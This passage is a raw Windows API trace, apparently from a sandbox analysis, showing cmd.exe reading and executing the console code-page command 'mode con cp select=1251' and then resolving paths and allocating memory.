lpDistanceToMoveHigh=0x0) returned 0x0 [0204.968] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.968] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c36, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0204.968] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.968] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.968] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c38, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0204.969] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.969] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.969] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c3a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0204.969] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.969] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.969] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c3c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0204.969] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.969] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.969] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c3e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0204.969] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.969] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.969] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0204.970] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.970] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.970] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c42, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0204.970] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.970] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.970] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c44, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0204.970] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.970] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.970] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c46, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0204.970] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.970] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.970] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c48, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0204.970] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.971] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.971] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c4a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0204.971] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.971] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.971] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c4c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0204.971] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.971] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.971] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c4e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0204.971] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.971] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.971] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c50, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0204.971] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.971] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.971] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c52, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0204.972] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.972] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.972] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c54, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0204.972] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.972] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.972] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c56, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0204.972] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.972] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.972] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c58, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0204.972] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.972] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.972] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c5a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0204.972] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.972] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.972] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c5c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0204.972] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.972] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.973] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0204.973] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c5e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0204.973] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.973] GetFileType (hFile=0x33c) returned 0x3 [0204.973] _get_osfhandle (_FileHandle=0) returned 0x33c [0204.973] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.973] _get_osfhandle (_FileHandle=1) returned 0x348 [0204.973] GetFileType (hFile=0x348) returned 0x3 [0204.973] _get_osfhandle (_FileHandle=1) returned 0x348 [0204.973] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0204.973] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x98d077fa98, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077fa98*=0x18, lpOverlapped=0x0) returned 1 [0204.974] GetProcessHeap () returned 0x24bfe7d0000 [0204.974] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x4012) returned 0x24bfe7d8fe0 [0204.974] GetProcessHeap () returned 0x24bfe7d0000 [0204.974] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d8fe0) returned 1 [0204.974] _wcsicmp (_String1="mode", _String2=")") returned 68 [0204.974] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0204.974] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0204.974] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0204.974] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0204.974] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0204.974] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0204.974] GetProcessHeap () returned 0x24bfe7d0000 [0204.974] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xb0) returned 0x24bfe7d8320 [0204.974] GetProcessHeap () returned 0x24bfe7d0000 [0204.974] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x1a) returned 0x24bfe7d6a80 [0204.975] GetProcessHeap () returned 0x24bfe7d0000 [0204.975] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x38) returned 0x24bfe7d1850 [0204.976] GetConsoleOutputCP () returned 0x1b5 [0205.527] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7c191fbb0 | out: lpCPInfo=0x7ff7c191fbb0) returned 1 [0205.527] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.003] GetConsoleTitleW (in: lpConsoleTitle=0x98d077f8e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0206.336] malloc (_Size=0xffce) returned 0x24bfe8f0840 [0206.336] ??_V@YAXPEAX@Z () returned 0x24bfe8f0840 [0206.337] malloc (_Size=0xffce) returned 0x24bfe900820 [0206.337] ??_V@YAXPEAX@Z () returned 0x24bfe900820 [0206.338] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0206.338] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0206.338] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0206.338] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0206.338] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0206.338] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0206.338] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0206.338] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0206.338] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0206.338] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0206.338] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0206.338] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0206.338] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0206.338] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0206.338] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0206.338] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0206.338] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0206.339] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0206.339] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0206.339] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0206.339] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0206.339] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0206.339] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0206.339] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0206.339] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0206.339] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0206.339] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0206.339] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0206.339] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0206.339] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0206.339] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0206.339] _wcsicmp (_String1="mode", _String2="START") returned -6 [0206.339] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0206.339] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0206.339] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0206.339] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0206.339] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0206.339] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0206.339] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0206.339] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0206.339] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0206.339] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0206.339] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0206.339] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0206.339] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0206.339] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0206.339] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0206.339] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0206.340] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0206.340] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0206.340] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0206.340] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0206.340] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0206.340] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0206.340] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0206.340] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0206.340] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0206.340] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0206.340] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0206.340] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0206.340] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0206.340] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0206.340] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0206.340] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0206.340] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0206.340] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0206.340] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0206.340] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0206.340] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0206.340] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0206.340] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0206.341] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0206.341] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0206.341] _wcsicmp (_String1="mode", _String2="START") returned -6 [0206.341] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0206.341] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0206.341] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0206.341] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0206.341] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0206.341] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0206.341] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0206.341] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0206.341] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0206.341] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0206.341] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0206.341] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0206.341] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0206.341] ??_V@YAXPEAX@Z () returned 0x1 [0206.341] GetProcessHeap () returned 0x24bfe7d0000 [0206.341] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xffde) returned 0x24bfe7d8fe0 [0206.343] GetProcessHeap () returned 0x24bfe7d0000 [0206.343] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x42) returned 0x24bfe7d83e0 [0206.343] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0206.343] malloc (_Size=0xffce) returned 0x24bfe900820 [0206.343] ??_V@YAXPEAX@Z () returned 0x24bfe900820 [0206.343] GetProcessHeap () returned 0x24bfe7d0000 [0206.343] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x1ffac) returned 0x24bfe7e8fd0 [0206.346] SetErrorMode (uMode=0x0) returned 0x0 [0206.346] SetErrorMode (uMode=0x1) returned 0x0 [0206.346] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x24bfe7e8fe0, lpFilePart=0x98d077f160 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x98d077f160*="Desktop") returned 0x17 [0206.346] SetErrorMode (uMode=0x0) returned 0x1 [0206.346] GetProcessHeap () returned 0x24bfe7d0000 [0206.346] RtlReAllocateHeap (Heap=0x24bfe7d0000, Flags=0x0, Ptr=0x24bfe7e8fd0, Size=0x4a) returned 0x24bfe7e8fd0 [0206.346] GetProcessHeap () returned 0x24bfe7d0000 [0206.346] RtlSizeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, MemoryPointer=0x24bfe7e8fd0) returned 0x4a [0206.346] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0206.346] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.346] GetProcessHeap () returned 0x24bfe7d0000 [0206.346] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x1bc) returned 0x24bfe7d6c30 [0206.346] GetProcessHeap () returned 0x24bfe7d0000 [0206.346] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x368) returned 0x24bfe7e9030 [0206.360] GetProcessHeap () returned 0x24bfe7d0000 [0206.360] RtlReAllocateHeap (Heap=0x24bfe7d0000, Flags=0x0, Ptr=0x24bfe7e9030, Size=0x1be) returned 0x24bfe7e9030 [0206.360] GetProcessHeap () returned 0x24bfe7d0000 [0206.360] RtlSizeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, MemoryPointer=0x24bfe7e9030) returned 0x1be [0206.360] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.360] GetProcessHeap () returned 0x24bfe7d0000 [0206.360] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xe8) returned 0x24bfe7d6e00 [0206.363] GetProcessHeap () returned 0x24bfe7d0000 [0206.363] RtlReAllocateHeap (Heap=0x24bfe7d0000, Flags=0x0, Ptr=0x24bfe7d6e00, Size=0x7e) returned 0x24bfe7d6e00 [0206.363] GetProcessHeap () returned 0x24bfe7d0000 [0206.363] RtlSizeHeap 